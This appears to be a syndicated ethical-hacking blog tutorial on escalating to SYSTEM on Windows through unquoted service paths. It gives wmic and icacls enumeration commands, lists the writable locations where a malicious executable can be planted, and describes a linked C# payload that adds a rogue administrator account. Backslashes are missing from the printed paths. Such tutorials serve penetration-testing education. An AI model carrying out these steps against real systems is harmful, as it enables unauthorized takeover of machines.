Windows Privilege Escalation – Unquoted Services

So, you’ve popped a user shell on a windows box and now you’re looking to escalate those privileges. Great! In this article we’ll look at one method of elevating your privileges by exploiting unquoted system services.

A Windows service is a program that runs in the background similar to a *nix daemon. Often they are automatically started when Windows loads but they can also be started manually by a user or by other software. When installing a Windows service a registry key is created at HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservices for the service along with several values. One of those values is the ImagePath value seen in this image and is used to specify the location of the service executable.

In this image you can see the file path is not surrounded by quotes and becomes a candidate for escalating our privileges. When a Windows service is started the CreateProcess function is used to start the service executable. If the ImagePath value is not surrounded by quotes the CreateProcess function must try to interpret the correct path to the service executable. For example, if the ImagePath value contained c:program filessub dirprogram name then the function would attempt to execute the following:

c:program.exe filessub dirprogram name
c:program filessub.exe dirprogram name
c:program filessub dirprogram.exe name
c:program filessub dirprogram name.exe

If any of these directories have weak permissions this allows us to place a malicious executable that Windows will run as SYSTEM allowing us to escalate our privileges. Now that we know how to take advantage of unquoted services let’s look at how to find them. You could simply look through the registry checking each service but that would take some time. An easier method is to query WMI and retrieve all services and then filter the results. This can be accomplished by executing the following command to list all services:

C:>wmic service get name,pathname,startmode

While this method will list all the services name, path to executable, and start mode we can go a few steps further to prune down our list to just those services that are unquoted. Let’s try the following command using the findstr command to filter our results:

C:>wmic service get name,pathname,startmode |findstr /i /v “C:Windows\” |findstr /i /v “””
Name                                 PathName                                                                                   StartMode
VulnService                       C:Program Files (x86)Vuln ServiceVuln Service BinVulnService.exe                       Auto

We pipe our results from wmic into the findstr program using the /i option to specify our search is not to be case sensitive and the /v option to show only those lines which do not contain a match. This will filter out all the Windows services and any services which contain quotes leaving us only with those service that are unquoted. Lucky for us we found a service named VulnService which has not been quoted and its StartMode is set to Auto. This means if we have appropriate permissions we can place a malicious executable at any of the following locations and our malicious exe will be executed with SYSTEM privileges the next time the service is started.

C:Program.exe
C:Program Files.exe
C:Program Files (x86)Vuln.exe
C:Program Files (x86)Vuln ServiceVuln.exe
C:Program Files (x86)Vuln ServiceVuln Service.exe
C:Program Files (x86)Vuln ServiceVuln Service BinVulnService.exe

To check permissions on a directory we can use the icacls tools. Let’s see what we come up with. We’ll check each directory looking for write permissions:

C:>icacls “c:”

c:
   BUILTINAdministrators:(F)

   BUILTINAdministrators:(OI)(CI)(IO)(F)

   NT AUTHORITYSYSTEM:(F)

   NT AUTHORITYSYSTEM:(OI)(CI)(IO)(F)

   BUILTINUsers:(OI)(CI)(RX)

   NT AUTHORITYAuthenticated Users:(OI)(CI)(IO)(M)

   NT AUTHORITYAuthenticated Users:(AD)

   Mandatory LabelHigh Mandatory Level:(OI)(NP)(IO)(NW)

 

C:>icacls “C:Program Files (x86)”

C:Program Files (x86)

                       NT SERVICETrustedInstaller:(F)

                       NT SERVICETrustedInstaller:(CI)(IO)(F)

                       NT AUTHORITYSYSTEM:(M)

                       NT AUTHORITYSYSTEM:(OI)(CI)(IO)(F)

                       BUILTINAdministrators:(M)

                       BUILTINAdministrators:(OI)(CI)(IO)(F)

                       BUILTINUsers:(RX)

                       BUILTINUsers:(OI)(CI)(IO)(GR,GE)

                       CREATOR OWNER:(OI)(CI)(IO)(F)

 

C:>icacls “C:Program Files (x86)Vuln Service”

C:Program Files (x86)Vuln Service

BUILTINUsers:(OI)(CI)(F)

                                    NT SERVICETrustedInstaller:(I)(F)

                                    NT SERVICETrustedInstaller:(I)(CI)(IO)(F)

                                    NT AUTHORITYSYSTEM:(I)(F)

                                    NT AUTHORITYSYSTEM:(I)(OI)(CI)(IO)(F)

                                    BUILTINAdministrators:(I)(F)

                                    BUILTINAdministrators:(I)(OI)(CI)(IO)(F)

                                    BUILTINUsers:(I)(RX)

                                    BUILTINUsers:(I)(OI)(CI)(IO)(GR,GE)

                                    CREATOR OWNER:(I)(OI)(CI)(IO)(F)

 

C:>icacls “C:Program Files (x86)Vuln ServiceVuln Service Bin”

C:Program Files (x86)Vuln ServiceVuln Service Bin

BUILTINUsers:(OI)(CI)(F)

                                                     NT SERVICETrustedInstaller:(I)(F)

                                                     NT SERVICETrustedInstaller:(I)(CI)(IO)(F)

                                                     NT AUTHORITYSYSTEM:(I)(F)

                                                     NT AUTHORITYSYSTEM:(I)(OI)(CI)(IO)(F)

                                                     BUILTINAdministrators:(I)(F)

                                                     BUILTINAdministrators:(I)(OI)(CI)(IO)(F)

                                                     BUILTINUsers:(I)(RX)

                                                     BUILTINUsers:(I)(OI)(CI)(IO)(GR,GE)

                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Sweet! We found two directories C:Program Files (x86)Vuln Service and C:Program Files (x86)Vuln ServiceVuln Service Bin/ which allows USERS full control (F) over the directories. This means we can place a malicious executable at any of the following locations to exploit the unquoted service:

C:Program Files (x86)Vuln ServiceVuln.exe
C:Program Files (x86)Vuln ServiceVuln Service.exe
C:Program Files (x86)Vuln ServiceVuln Service BinVulnService.exe

Now all we need is a malicious executable to elevate our permissions. There’s a lot of ways you can go about doing this and I’m choosing to create a C# program to create a new administrator account named 1up with the password secret. Let’s get started writing our C# code.

View C# Source Code Here

Now compile the code using Visual Studio Community and place the executable at any of the target locations we discovered with write permissions. Once your malicious executable is in place the final task is to restart the service to execute our exe. You’ll likely find you won’t have the needed permissions to restart the service. Since the service was set to AUTO we simply wait until the system reboots or we can reboot the system ourselves with:

shutdown -r

If all goes well when Windows reboots it will start our malicious executable creating a new administrator user that we can use to elevate our permissions which completes our hack.

Check out the YouTube video

Happy Hacking!

 

*** This is a Security Bloggers Network syndicated blog from The Ethical Hacker Network authored by HackHappy. Read the original post at: http://feedproxy.google.com/~r/eh-net/~3/ZL9N1nyb62M/